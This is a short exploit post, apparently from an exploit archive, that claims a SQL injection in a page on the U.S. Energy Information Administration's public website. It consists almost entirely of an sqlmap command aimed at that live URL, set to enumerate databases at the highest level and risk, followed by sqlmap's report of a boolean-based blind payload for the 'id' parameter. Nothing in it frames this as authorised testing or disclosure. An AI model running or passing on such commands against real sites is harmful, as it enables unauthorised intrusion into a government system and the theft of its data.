# Exploit Title : U.S. Energy Information Administration (EIA) SQL Injection
# Author : rev0x
# Date : 05/09/2021
# Tested On : Kali Linux / Windows 10
python sqlmap.py -u "https://www.eia.gov/tools/faqs/faq.php?id=74" --dbs --level=3 --risk=3 --random-agent
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-2170 OR 6693=6693
---
